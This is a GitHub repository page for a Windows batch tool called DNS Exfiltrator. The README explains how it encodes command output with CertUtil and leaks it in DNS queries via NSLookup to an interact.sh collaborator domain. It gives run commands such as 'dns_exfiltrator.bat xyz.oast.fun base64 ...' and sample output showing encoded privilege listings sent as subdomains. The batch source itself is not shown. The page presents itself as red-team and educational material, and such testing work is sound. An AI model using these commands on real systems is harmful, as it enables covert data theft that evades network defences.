Skip to content

ivan-sincek/dns-exfiltrator

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit

src

src

 
 

.gitattributes

.gitattributes

 
 

LICENSE

LICENSE

 
 

README.md

README.md

 
 

Repository files navigation

DNS Exfiltrator

Exfiltrate data with DNS queries. Based on CertUtil and NSLookup.

Base64 or Hex encode the command output using CertUtil, and then exfiltrate it in chunks up to 63 characters per query using NSLookup.

In case of Base64 encoding, some special characters will be replaced due to the domain name limitations:

Base64 Character Replacement
+ plus
/ slash
= eqls

Tested on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

Future plans:

  • create a Python script to parse interact.sh results,
  • create a one-liner out of the whole Batch script,
  • create a Burp Suite extension that will use a Burp Collaborator server.

How to Run

Download, unpack, give necessary permissions, and run the latest interact.sh client:

chmod +x interactsh-client

./interactsh-client -dns-only -json -o interactsh.json

After running the tool, you should be able to see the interact.sh (collaborator server) subdomain, e.g. xyz.oast.fun.

Next, make sure to specify either base64 or hex as the encoding, and Base64 encode your Batch one-liner command, e.g. whoami equals to d2hvYW1p.

Finally, open the Command Prompt from \src\ and run the following command:

dns_exfiltrator.bat xyz.oast.fun base64 d2hvYW1p

Runtime

C:\Users\W10\Desktop>dns_exfiltrator.bat xyz.oast.fun base64 d2hvYW1pIC9wcml2
################################################################
#                                                              #
#                     DNS Exfiltrator v1.3                     #
#                                by Ivan Sincek                #
#                                                              #
# Exfiltrate data with DNS queries.                            #
# GitHub repository at github.com/ivan-sincek/dns-exfiltrator. #
#                                                              #
################################################################
Server:  UnKnown
Address:  172.20.10.1

Non-authoritative answer:
Name:    UFJJVklMRUdFUyBJTkZPUk1BVElPTiANCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0.xyz.oast.fun
Address:  206.189.156.69

Server:  UnKnown
Address:  172.20.10.1

Non-authoritative answer:
Name:    gDQpQcml2aWxlZ2UgTmFtZSAgICAgICAgICAgICAgICBEZXNjcmlwdGlvbiAgIC.xyz.oast.fun
Address:  206.189.156.69

Server:  UnKnown
Address:  172.20.10.1

Non-authoritative answer:
Name:    AgICAgICAgICAgICAgICAgICAgICAgU3RhdGUgICAgDQo9PT09PT09PT09PT09P.xyz.oast.fun
Address:  206.189.156.69

...

About

Exfiltrate data with DNS queries. Based on CertUtil and NSLookup.

Topics

dns security networking malware penetration-testing batch bug-bounty wireshark offensive-security ethical-hacking nslookup red-team-engagement certutil burp-collaborator-server exfiltrator lolbas dns-query

Resources

Readme

License

MIT license
Activity

Stars

19 stars

Watchers

2 watching

Forks

8 forks
Report repository

Releases

No releases published

Languages